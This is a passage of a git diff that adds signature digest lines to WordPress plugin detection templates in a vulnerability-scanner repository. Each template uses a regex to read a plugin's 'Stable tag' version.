4a0a0047304502200fe461370f206be5afc9a9dc6040862085559fc5b2925e30d1f52e84c6baf08e022100d30ad6a7d9f4467ea2ee2b22b83264574032c8c26deaf2d822ce4271043e2c48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..5ccf89eac4 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210084f506554b53ce73437fb9a4a5017025b31567965bf1b257becc76a2c05dfa3f0220736b2bf5c5c3b5ecc9caa8e215025ba64d8fad1688f97516ee9784558391f2ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..1e80a3c7e5 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220688205650cc4f19a37fef857d5da44681e79c661f87a94f59bbcb62ac7969a3102202026dedda9b8b69374c20f0686dcd7a9ec5186b042f803b448a3965add393c4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..d8ddb9c589 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c086cc833ceee38f09f49dbbd30c89afcf5bad6afe61795177f867f3770499702206b826e4b198f5542caa61ab3e174a72a5479fd1c1fe6851dedd7243b9db63dc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..de5d281177 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200525e8f4c54756ef07238611241e18874db0906d5f40f47e182822b2e888276f022100e0ad3d78c2b0ce86b0304d44aaca0f29c2ab5d01bd49e30aa9e3ab6dde27b938:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..622360c446 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e2371901d44075384beacb73adacbc2cba3db20e9da81db6c001abc99d9e72c9022100ceabbbdba1a44f406ed0895e6515ed748bc3d2390cb28387d5091e1486e08214:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..a28599db87 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008c667a1c6ee5adc8c89a2670308dbc34647b712cc42421dace42a60fefb7f71302201cbcef95239e2e0489904a2261ae86bc5208db8956b506c645d8e3c95dfe2a0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..ec13e9029d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203605ddf17d02f5431e25ebbe1f0fc44c0ff08510c5ce7632fe78f5e1a612f9ef0220478de3aaa527a11042148e58eac7570f6a126dd727892510384e32eae69ba435:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..b9a278499e 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203e52e105e681e78994a7cc7246339754922cad068b3c6fed7210c25d93338ed3022055949c4164961ad00cdb4016797c0c9962b581624cb6bc8cf35172ab0de4ea9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..4c54dab98d 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022053c5094c297797a55ba4121f33c73789d4e56913829590f34ca77c4c90211fc902204a57252790a14ff39b8aef472d183662938296f751a6446e5237f89ef25a7c63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..f56ffdd37c 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d84dee7574771332c76a2bc45a53ad783930e4b8644db6fc4a80f13d74b1ce6802210099e63cbb7ec6a9fef933b564486997e73c2e9dd74ac119253f7874e282f5cf3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..66030de838 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008cec7517444aafdbb2b4858f143f3df409ca7d8d7a583cde9b7d00f7eb6726c5022100e5e52e695d1327bc5f3699751a6aa1f6b2526a47293479214be6b179f380ac4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..b64bb94f0b 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206803a41ea002c5d9dd985d4b18a98feb41c8f2227102264063953186c920b19402207e1ba5615940ad0c106be428a6d4a92908ac00434074e975d7f108e01741164e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..bb9cfec77f 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220741055d09d944f33347dfe74713ce37f8e02f5e5bce663ccaaeb4622b9bf08a1022100ba9ddab77c65be60f54658cedeea6fb80413e429595e7df4bf6bc3ae9b44fb79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..37e446fe98 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202c5dc7a378fa5515f3f3bd442a1597bf3d150aa2596382e0d27b0fe3bd97583f022100d87397ba95b5d05f87f442243f878d4ce566fbf5f5c495aa97258d483e24757e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..93ed77bb65 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f8e8bce5b375abd0c94c8d223c49980021b5525e2b45fb395195c69cd0be585b022100b233686efcbbc44d5bca39f4412ea22b081ce18075305a8187b0644c13066093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..c794e0e085 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008498a8794f7fa8822e661e604ea035d98a26c2bd9a8924f32ae8b6cd29a2f5f5022100f80dc20de55e291d4e68d1ba55f4fc18c7c8e5521a914a6e744cdf7dd89e3686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..f54b5deea8 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022009aaf0fc7cfade6d7f76edfadb6fce6d750dcd85e11b6f0e106ce378832c829c022100ec20cc6ff22c8b11b12fad37c55feddeb9edbbfb6c5c240e0eff144aac6b16e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..cba6644cc3 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220021e6ecee5bafe3904e5a4c3c7efef5bc85295fb7883a6263c98090b99d6a2860221008ad7a03a07c6cb2499f457c7b4e169ae91cfeb9cf2c6b324b77bd8fc37c00052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..2ae58519ed 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fcfb44affe761691c4acc1a41c8443d5e87a8c13cce10a76a1f559dbf9facb5c022100ef1fa05eff245231cf07ecb944e59b807d93c5b625a1712e0a86a269ea0ad66a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..3c1e37f4c5 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207134ca17131683f9659b38556b52a596a63375b7b3862a61aa47641b0190956c02202f03dc8c0f02e31e9d18e8a6ef5106dce43b88debbbc752607bd98e4aeed37e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..abf510e105 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220797c5545d1ab5441bbf00e6931e2401a70f50d10271c7e4621536f387abc0ddc022070579512aeeee26ccada4f8832c30f69d348d5c6c969aa5de2f46fcc4ad2ff9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..5a975ef149 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201c9bdbb210ef7cf9c7120f40b742b3d7ecd217b81f246da504eb6f6253afd7e7022100d97b626f668233eb407847db93094b3cf39d5c75015ff8989acdf07134d9ed24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..d0ab9576ef 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210095b74b0e2da022166c152720fd6d4a05dc8f04992ff5d5c8ad15c5e910dad15c022100fbeea3290c41a3a911013df21c94ea6b2b07dcb02ae21328da0bb69d80e4e352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..2841f0f5af 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201843a26ec9e5a7b385d21839bfa1a2bd6fa829eda2d3984ca2460cd15f8bb65a02206c120227d75a51897f0017d61cd9aa993cb38d1e85ba3e15b492a4ea5b64d4b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..816ff1e27b 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a5bd6ff033b70a16ab69f43996bcc126891af71d81e5c756cbd109b6d9e9c0520221009c8051d42265aa79297ad882fd1e22ae0199173de3f650fa572f8f5eb1ea8e61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..85dbdf03bf 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210099e0d3d1dba9abc1844830ee9907aa6fb9076e4340f5e7a5919c4896bc91e870022100c18e625590b130d281b15ccd4ee396b3fc8f76242285d2b403a0e0064239454d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..46945ee30a 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009e9b36d6847981c4dd0484297323bd154ecb690d21c3bf7e80ab18d47d2c140b0221009061c653f0ed6c3e1d81cf8aad0048b80642b5968d7b1b21f032f0a72f1668d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..c29867c534 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204fa7f53660950902415c3090734620c1cc2c95deda7de910c3f5c388dd182ed3022100ee4ec4fc55bc40bac3b49ff6c52f2eb798a87f7ce0aab5e371b0435bbf59791b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..3b3ec6df96 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a93cf23ca70d39410751e8f849290b08aee51b267187410d7a8f1ab9ea830df20220497453117be35d778ab0f804565cce9e41a6fba89425de68cf200c84a24a7177:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..369d17cd29 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210082e05267bb299df0f89c7a9ce9fb529bfafc5d8a729512ad1d5567bb366c922002200dcd36e07a61d7a1e7d1390cb88e7c50e5debfa6bda5d5fdbdf94c9a52c6f21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..62bfcd1f6e 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200b8a5aee809ddc641073c7373307655213808d8338ff3087a7f3a01f11cfd905022009042afe1f7835f5e8fda422b0f7c3472953983617c36721a2e4c4da189932a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..ceebae91f3 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206e06892608b6858d9ad91c5a2f287ae74d9a39bd923057038a6da35808b407f902203c1239777b509b832359b56a60b0d72025b4174e330466f4a1d1c7a31bac9cc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..ddaaba4004 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202dcc88ae6e35cc701426df39cb5beb4df9b0444a680f7cc39b57cf9bfe58a5cf022100b334e844d7efe18c6f3b800c9ee905ab7d0c58ceda5239e113eb122140915774:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..ebf6358791 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ae39757cb358afcddc9d8777d27523e807d351bd459bee4137b31fc69950bc5f02201420b7384c506d10904749d4971c7f28a9712ddc0859a8fe720542ec73ad51e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..f76c7050a1 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220751764b67ce0a9087e1ec201c61157de0ebc9880b4fdf6e2446e603885d674bf022100fcece1c402762621b4e67a33114d4c0d6105757702ebfbbcbcc3973ccf8c5b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..eb98485422 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d80e2575b186c916a64261423c6745861b89e6c354bac56c7bdd500944d8cb4e02200be57d84eb831129352d68074b7945385203a36dd06a18208f0403a766096155:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..9293472896 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210083f34cf0a25d45934cb5c0406d8553debdc2d3b4fd35e1e5b3c4938ed73ccc6e022100b0a4132b7e57e64e2d28f331869304860222bc62bcb6c3a7b7e2f5368990c029:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..013566f4a1 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022047fb6f8764c7e66038652c1b954fa2c5971dc18dfb88da5c62d988cfc6bbafaa02202a5e2c9fab5462c4e39376d52fdc64376eb0519cffbf5a6c6a91c1d86a996f87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..7e2c97da64 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200e6fdd9b6ff3df7edc8286e4b7c4c492de45f9e3f01cf06a61b1236a2309748d02207c9d21c305646a0203769f09ecaf99cda9a746644a9902197df429fcae5d756f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..61d2c4ca51 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200b6531158ef814ec02823b746ac2c492b806b3535a37933adba7a65abcc4294f022100fb433a518824fb472fa1af7a163272024eb935ff9d0ed76654a7fd70803c5f0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..baf0241f1d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ba2e556d60e0e249b8cd5889fe089dc9bc0d7726325339586b3368698b909254022100dd8040ea1afe2ef493dec4c78b3f666386625e8b317269b20b971a814475259d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..b0abf0b9fa 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204e5ead95348c8a3df47c0a8b1e469b5e594cb3317efe10317f5b629ab3e1e5f4022056f13090e3c23931ba2e67ba29cc4e24ddaa9801c8533378ae2a2821229678dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..af1af7e036 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202f06fac8aca28f8c3a66942c2e84645169f967f7edf28f0fb23ca5391242e615022100faed98cae68059e8d76d36f62f56e2f67c3e30b954a836c9447d5401b4f15983:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..5eff65f59e 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009011f70f8a20fa54ce0898a9d6228fa9effb0b0d49225f11c507cee284e8ee9e022100bf232ef3be87eaa95ca9f2c54e8fab115cc6c895f320f5960c7252046639c874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..89a0347480 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206279e8da43ae9e2c5806d56ea609198894398eed5561f7bf50709ddc810cd7be02200e9244ac67737bbc1b955ad81164e71b797a9b91c812ba32f148b3050d06bbec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..9d68ff0bda 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fa08f4fac0c55eec455392b3a9966a546dba761bc5fcf609a8d976441de4089302210088c49e4eeaf6942619382819c6fe625627b3afba23f1661d5b95774c3a177cdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..acaf6f1198 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml 